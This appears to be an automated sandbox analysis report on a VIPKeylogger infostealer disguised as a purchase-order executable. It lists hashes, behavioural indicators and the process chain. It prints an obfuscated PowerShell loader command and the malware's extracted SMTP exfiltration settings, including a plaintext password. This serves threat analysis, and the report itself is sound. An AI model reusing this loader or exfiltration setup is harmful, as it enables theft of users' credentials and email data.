Analysis
-
max time kernel
298s -
max time network
276s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2024 17:32
Static task
static1
Behavioral task
behavioral1
Sample
PO-Q01918 200X150.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
PO-Q01918 200X150.exe
Resource
win10v2004-20241007-en
General
-
Target
PO-Q01918 200X150.exe
-
Size
557KB
-
MD5
10af7f586190bc8a4de0850d39975e68
-
SHA1
77c03f9e53c6fe5b7972741766bcae5c8be022c7
-
SHA256
0ae1e00bec56390e433869331168026ba022944634003a790324d48ebb129673
-
SHA512
3117d1e30c6623120815447dfd81f61f00e04e1703a693c21777aa1007908ea45815ccfe47a74df372454f2e9dd284bbf062faa09afb9da6a7e735212946cba3
-
SSDEEP
12288:1kuicmiSkWUG1iUOFYTqB91HhVs3mySMpQKA:NicmdktG0nYQ1HtGnA
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
JA-*2020antonio - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 21 5056 msiexec.exe 23 5056 msiexec.exe 25 5056 msiexec.exe 27 5056 msiexec.exe 31 5056 msiexec.exe 34 5056 msiexec.exe 36 5056 msiexec.exe 48 5056 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 drive.google.com 21 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 33 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 5056 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2096 powershell.exe 5056 msiexec.exe -
pid Process 2096 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PO-Q01918 200X150.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 5056 msiexec.exe 5056 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2096 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2096 powershell.exe Token: SeIncreaseQuotaPrivilege 2096 powershell.exe Token: SeSecurityPrivilege 2096 powershell.exe Token: SeTakeOwnershipPrivilege 2096 powershell.exe Token: SeLoadDriverPrivilege 2096 powershell.exe Token: SeSystemProfilePrivilege 2096 powershell.exe Token: SeSystemtimePrivilege 2096 powershell.exe Token: SeProfSingleProcessPrivilege 2096 powershell.exe Token: SeIncBasePriorityPrivilege 2096 powershell.exe Token: SeCreatePagefilePrivilege 2096 powershell.exe Token: SeBackupPrivilege 2096 powershell.exe Token: SeRestorePrivilege 2096 powershell.exe Token: SeShutdownPrivilege 2096 powershell.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeSystemEnvironmentPrivilege 2096 powershell.exe Token: SeRemoteShutdownPrivilege 2096 powershell.exe Token: SeUndockPrivilege 2096 powershell.exe Token: SeManageVolumePrivilege 2096 powershell.exe Token: 33 2096 powershell.exe Token: 34 2096 powershell.exe Token: 35 2096 powershell.exe Token: 36 2096 powershell.exe Token: SeDebugPrivilege 5056 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1816 wrote to memory of 2096 1816 PO-Q01918 200X150.exe 83 PID 1816 wrote to memory of 2096 1816 PO-Q01918 200X150.exe 83 PID 1816 wrote to memory of 2096 1816 PO-Q01918 200X150.exe 83 PID 2096 wrote to memory of 5056 2096 powershell.exe 97 PID 2096 wrote to memory of 5056 2096 powershell.exe 97 PID 2096 wrote to memory of 5056 2096 powershell.exe 97 PID 2096 wrote to memory of 5056 2096 powershell.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\PO-Q01918 200X150.exe"C:\Users\Admin\AppData\Local\Temp\PO-Q01918 200X150.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Depletions=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Coprides\Centuple.Ama';$Crooksterned=$Depletions.SubString(700,3);.$Crooksterned($Depletions)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5056
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
73KB
MD5f107ba814c47b96c6a0e5ed4b0d110a4
SHA162cbb8e89dc9cdc9ffaf38c7284e95c067fce4f8
SHA256c1a58e217ef05e0ce41b20b1849b1131ebe350d87333ab57a52da61243a7dee7
SHA51249c45250eabd4ec2a8176dd0b658b021c85abce9b2af151df9b2a651153f40c9c79638a48a12725239faa2fe70b73d02d16f184427f35cb8908c9a3d9c3aa221
-
Filesize
299KB
MD558c2b03351c618b0dd56b1d0fb26ae54
SHA11bfcbd92f0680695214092a697038f4d05d71e95
SHA256c58c7722bb73dc0d4ad1095d5285b6b15808961a9a604a9a53490583ddb49abe
SHA512aabf3ef2c7227c3f6089b309bb893e78d4282b266b4b6993f114a831c56445d7e881b72cc6c4796b1ef9ba6b6f3d8ab2dc2ee2f82319aaac22be2cc5b8edd57a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82